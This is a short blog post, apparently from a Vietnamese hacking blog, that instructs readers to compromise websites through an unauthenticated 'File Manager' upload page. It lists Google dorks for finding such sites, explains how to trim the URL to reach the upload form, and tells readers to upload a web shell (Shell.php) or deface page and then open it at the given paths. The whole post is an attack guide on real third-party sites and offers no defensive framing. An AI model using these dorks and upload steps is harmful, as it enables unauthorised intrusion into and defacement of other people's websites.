J2TEAM Security: A must-have extension for Chrome users. Install now!
Trang chủ
Exploit
Shell

"File Manager" Remote Shell and Deface Upload Vulnerability.

"File Manager" Remote Shell and Deface Upload Vulnerability. | Juno_okyo's Blog
Following is the vulnerability to remotly upload your shell or deface on a vulnerable website.

Google Dorks:
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
Vulnerable URL:
http://www.site.com/filemanager/index.html
Now, google the dork and select any website from the search result.
When you will select any website, the URL will be as
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Now delete the text after filemanager. Now after deleteing the text URL will be
http://www.site.com/filemanager/
You will get a upload option, upload your shell or deface there.
Your will will be uploaded in Userfiles directory. z
To view your shell visit the below mentioned URLs:
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!